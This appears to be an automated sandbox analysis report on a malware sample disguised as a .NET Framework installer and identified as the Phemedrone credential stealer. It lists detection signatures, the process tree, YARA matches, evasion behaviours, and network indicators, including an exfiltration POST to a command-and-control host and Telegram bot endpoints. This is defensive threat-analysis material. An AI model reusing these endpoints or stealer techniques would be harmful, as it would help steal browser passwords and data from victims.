Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dotNetFx40_Full_setup.exe

Overview

General Information

Sample Name:dotNetFx40_Full_setup.exe
Analysis ID:1319489
MD5:5d4392b56aa4ebac400bbe86fe5d0767
SHA1:a68a6004e111ba899254aa015d93706037c447ff
SHA256:a604eed1325b12671370e268783cfa74f8675a468492ff98416187d73768b4af
Tags:32dropperexePhemedroneStealer
Infos:

Detection

Phemedrone Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Telegram Recon
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Yara detected Phemedrone Stealer
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Generic Downloader
.NET source code contains very large strings
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
Drops PE files
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • dotNetFx40_Full_setup.exe (PID: 6744 cmdline: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe MD5: 5D4392B56AA4EBAC400BBE86FE5D0767)
    • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • G5K9HNJ7.exe (PID: 6860 cmdline: "C:\ProgramData\Start Menu\G5K9HNJ7.exe" MD5: 53406E9988306CBD4537677C5336ABA4)
      • Setup.exe (PID: 7012 cmdline: C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64 /ia64 /web MD5: 006F8A615020A4A17F5E63801485DF46)
        • WINWORD.EXE (PID: 2284 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
          • splwow64.exe (PID: 6936 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • EQB4OREJ.exe (PID: 6896 cmdline: "C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe" MD5: AE881BAA8C3A00A94E5994826BDAC3AA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
    C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
          00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
            Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744JoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
              Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744Invoke_MimikatzDetects Invoke-Mimikatz StringFlorian Roth
              • 0x1708:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
              • 0x163506:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
              • 0x1a2ffc:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
              Process Memory Space: EQB4OREJ.exe PID: 6896JoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpackJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
                  0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    3.0.EQB4OREJ.exe.480000.0.unpackJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
                      3.0.EQB4OREJ.exe.480000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        0.2.dotNetFx40_Full_setup.exe.13314658.1.unpackJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
                          Click to see the 1 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Snort Signatures

                          No Snort rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: http://rakishev.net/wp-load.phpAvira URL Cloud: Label: malware
                          Multi AV Scanner detection for submitted file
                          Source: dotNetFx40_Full_setup.exeVirustotal: Detection: 56%Perma Link
                          Source: dotNetFx40_Full_setup.exeReversingLabs: Detection: 51%
                          Antivirus / Scanner detection for submitted sample
                          Source: dotNetFx40_Full_setup.exeAvira: detected
                          Multi AV Scanner detection for domain / URL
                          Source: rakishev.netVirustotal: Detection: 5%Perma Link
                          Source: http://rakishev.net/wp-load.phpVirustotal: Detection: 11%Perma Link
                          Source: http://rakishev.netVirustotal: Detection: 5%Perma Link
                          Machine Learning detection for sample
                          Source: dotNetFx40_Full_setup.exeJoe Sandbox ML: detected
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00217C12 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,DecryptFileW,GetLastError,2_2_00217C12
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021751D CryptAcquireContextA,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,2_2_0021751D
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA159B176 CryptUnprotectData,3_2_00007FFDA159B176
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA159B25B CryptUnprotectData,3_2_00007FFDA159B25B
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C9517D1 __EH_prolog3,GetLastError,CertCloseStore,CryptMsgClose,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,4_2_6C9517D1
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C938094 CryptMsgGetAndVerifySigner,4_2_6C938094
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C938083 CryptQueryObject,4_2_6C938083
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C9380A5 CryptHashPublicKeyInfo,SetLastError,4_2_6C9380A5
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C9380D5 CryptMsgGetParam,SetLastError,4_2_6C9380D5
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C938114 CryptDecodeObject,SetLastError,4_2_6C938114
                          Source: dotNetFx40_Full_setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1033\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1025\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1028\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1030\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1031\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1029\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1036\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1035\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1032\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1038\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1037\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1040\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1041\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1042\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1044\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1043\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1046\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1045\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1055\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1053\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2052\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1049\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3082\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2070\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3076\eula.rtfJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dotNetFx40_Full_setup.exe.logJump to behavior
                          Source: dotNetFx40_Full_setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: sqmapi.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813403498.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813241400.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813657014.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, sqmapi.dll.2.dr
                          Source: Binary string: SetupEngine.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, SetupEngine.dll.2.dr
                          Source: Binary string: boxstub.pdb source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, G5K9HNJ7.exe, G5K9HNJ7.exe, 00000002.00000003.797545019.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, G5K9HNJ7.exe, 00000002.00000000.797030009.0000000000211000.00000020.00000001.01000000.00000006.sdmp, G5K9HNJ7.exe.0.dr
                          Source: Binary string: SetupUtility.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, SetupUtility.exe.2.dr
                          Source: Binary string: Setup.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000000.815079192.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Setup.exe.2.dr
                          Source: Binary string: SetupResources.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, SetupResources.dll14.2.dr, SetupResources.dll18.2.dr, SetupResources.dll4.2.dr, SetupResources.dll9.2.dr, SetupResources.dll11.2.dr, SetupResources.dll15.2.dr, SetupResources.dll17.2.dr, SetupResources.dll13.2.dr, SetupResources.dll20.2.dr, SetupResources.dll3.2.dr, SetupResources.dll21.2.dr, SetupResources.dll22.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll19.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll16.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll23.2.dr, SetupResources.dll8.2.dr, SetupResources.dll12.2.dr, SetupResources.dll10.2.dr
                          Source: Binary string: SetupUi.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, SetupUi.dll.2.dr
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0021774A
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002192BB GetFileAttributesW,GetLastError,SetFileAttributesW,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,GetLastError,FindClose,RemoveDirectoryW,GetLastError,2_2_002192BB
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021A7B1 FindFirstFileW,GetLastError,FindNextFileW,CloseHandle,FindClose,2_2_0021A7B1
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C638097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_6C638097
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C624281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_6C624281
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C925B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_6C925B82
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C92410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_6C92410A

                          Networking

                          barindex
                          May check the online IP address of the machine
                          Source: unknownDNS query: name: ip-api.com
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.EQB4OREJ.exe.480000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, type: DROPPED
                          Source: global trafficHTTP traffic detected: GET /json/?fields=11827 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /wp-load.php HTTP/1.1Content-Type: multipart/form-data; boundary=----------------------------8dbc4f2ae4bdbe9Host: rakishev.netContent-Length: 486789Expect: 100-continueConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe.0.drString found in binary or memory: http://ip-api.com/json/?fields=11827
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rakishev.net
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rakishev.net/wp-load.php
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002821000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002977000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.971799704.0000000012939000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe.0.drString found in binary or memory: https://t.me/TheDyer
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002821000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002977000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.971799704.0000000012939000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe.0.drString found in binary or memory: https://t.me/reyvortex
                          Source: unknownDNS traffic detected: queries for: ip-api.com
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C964B54 URLDownloadToFileW,4_2_6C964B54
                          Source: global trafficHTTP traffic detected: GET /json/?fields=11827 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownHTTP traffic detected: POST /wp-load.php HTTP/1.1Content-Type: multipart/form-data; boundary=----------------------------8dbc4f2ae4bdbe9Host: rakishev.netContent-Length: 486789Expect: 100-continueConnection: Keep-Alive

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                          .NET source code contains very large strings
                          Source: dotNetFx40_Full_setup.exe, Program.csLong String: Length: 1299214
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002230492_2_00223049
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002220562_2_00222056
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021F9FE2_2_0021F9FE
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002242522_2_00224252
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00220BD02_2_00220BD0
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0022630E2_2_0022630E
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002273D82_2_002273D8
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA15919673_2_00007FFDA1591967
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA1595D053_2_00007FFDA1595D05
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C49CBE64_2_6C49CBE6
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C63D0644_2_6C63D064
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C63D81C4_2_6C63D81C
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C629A504_2_6C629A50
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C979F124_2_6C979F12
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C97A9BE4_2_6C97A9BE
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C95E49E4_2_6C95E49E
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C97A4684_2_6C97A468
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C97C65E4_2_6C97C65E
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C91F7904_2_6C91F790
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C97B09F4_2_6C97B09F
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C97C00B4_2_6C97C00B
                          Source: dotNetFx40_Full_setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C944E0D ExitWindowsEx,4_2_6C944E0D
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: String function: 0021854A appears 42 times
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: String function: 00234DF4 appears 54 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C976E1A appears 546 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C94833E appears 579 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C49E8E8 appears 173 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C4B265B appears 227 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C9139AD appears 43 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C968B7A appears 109 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C9485BC appears 56 times
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00217A0A: GetDriveTypeW,SetErrorMode,SetErrorMode,SetErrorMode,CreateFileW,DeviceIoControl,CloseHandle,SetErrorMode,2_2_00217A0A
                          Source: SetupResources.dll16.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: SetupResources.dll1.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll4.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll22.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll14.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll17.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll10.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll13.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll19.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll9.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll5.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll2.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll16.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll21.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll18.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll15.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll8.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll23.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll12.2.drStatic PE information: No import functions for PE file found
